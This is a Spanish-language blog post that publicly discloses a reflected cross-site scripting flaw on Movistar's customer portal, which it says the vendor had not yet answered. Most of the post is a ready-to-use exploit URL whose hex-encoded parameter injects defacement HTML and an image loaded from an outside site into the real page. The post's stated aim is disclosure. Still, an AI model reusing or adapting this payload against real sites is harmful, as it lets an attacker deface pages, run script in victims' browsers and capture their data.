Movistar afectado por Cross Site Scripting (XSS)

Se encontró una vulnerabilidad en la página de Movistar => https://www.canalcliente.movistar.es (XSS) a través de la cual un atacante puede inducir a un usuario “víctima” a visitar dicha página.

Consta de una URL modificada especialmente, que ejecuta un código html/javascript en el navegador del usuario “víctima”, concretamente en la sección de seguridad/márgen de confianza, entre el navegador y el servidor pudiendo obtener la información enviada por el usuario y/o pudiendo establecer acciones por él.

Movistar fue avisado a través de un correo y de su sistema de contacto en la misma web, pero no se ha obtenido aún respuesta.

Exploit => https://www.canalcliente.movistar.es/fwk/cda/controller/CCLI_CW_publico/0,2214,259_1854_200108516_0_0,00.html?codError=SGAP036&mensaje=%3C%68%31%3E%4C%61%20%70%6F%6C%69%63%69%61%20%63%6F%6E%73%69%67%75%65%20%61%74%72%61%70%61%72%20%61%20%63%4C%69%6D%42%6F%3C%2F%68%31%3E%3C%70%3E%3C%73%74%72%6F%6E%67%3E%4C%61%20%70%6F%6C%69%63%69%61%20%63%6F%6E%73%69%67%75%65%20%61%74%72%61%70%61%72%20%61%6C%20%68%61%63%6B%65%72%20%63%61%74%61%6C%61%6E%20%63%4C%69%6D%42%6F%3C%2F%73%74%72%6F%6E%67%3E%2E%3C%69%6D%67%20%73%72%63%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%74%74%76%6E%2E%63%6F%6D%2E%76%6E%2F%55%70%6C%6F%61%64%65%64%2F%61%64%6D%69%6E%69%73%74%72%61%74%6F%72%2F%68%61%63%6B%65%72%2E%6A%70%67%3E%3C%70%3E%3C%70%3E%45%6C%20%52%65%79%20%64%65%6C%20%58%53%53%20%63%6F%6D%6F%20%6C%65%20%64%65%6E%6F%6D%69%6E%61%6E%20%61%6C%67%75%6E%6F%73%2C%20%73%65%20%6C%61%73%20%76%65%72%61%20%63%6F%6E%6C%61%20%6A%75%73%74%69%63%69%61%20%70%6F%72%20%65%6C%20%61%73%61%6C%74%6F%20%61%20%77%61%6C%74%72%61%70%61%73%2E%63%6F%6D%3C%2F%70%3E%3C%70%3E%55%6E%20%61%6D%69%67%6F%20%73%75%79%6F%20%71%75%65%20%64%65%73%65%61%20%6D%61%6E%74%65%6E%65%72%20%65%6C%20%61%6E%6F%6E%69%6D%61%74%6F%2C%20%6E%6F%73%20%63%75%65%6E%74%61%20%71%75%65%20%79%61%20%73%61%62%69%61%20%65%6C%20%71%75%65%20%74%65%6E%69%61%20%71%75%65%20%73%65%72%20%75%6E%20%6A%75%61%6B%65%72%20%64%65%20%65%73%6F%73%2C%20%70%71%20%6E%6F%20%65%72%61%20%70%6F%73%69%62%6C%65%20%71%75%65%20%65%6E%20%65%6C%20%63%6F%75%6E%74%65%72%20%73%74%72%79%6B%65%20%73%69%65%6D%70%72%65%20%6C%65%20%64%69%65%72%61%20%65%6E%20%6C%61%20%63%61%62%65%7A%61%2E%3C%70%3E%3C%70%3E%3C%2F%70%3E%3C%2F%70%3E%3C%70%3E%3C%70%3E%3C%2F%70%3E%3C%2F%70%3E%3C%70%3E%3C%70%3E%3C%2F%70%3E%3C%2F%70%3E

of: Lostmon ; cLimBo

Anuncios

0 Responses to “Movistar afectado por Cross Site Scripting (XSS)”



  1. Dejar un comentario

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s




Blog Stats

  • 613,147 visitas

RSS

Feed
mayo 2008
L M X J V S D
« Abr   Jun »
 1234
567891011
12131415161718
19202122232425
262728293031  

Usuarios online:

counter

Otras URL’s

TiraEcol

Tira Ecol
BlogESfera Directorio de Blogs Hispanos - Agrega tu Blog
Google PageRank 
		Checker

A %d blogueros les gusta esto: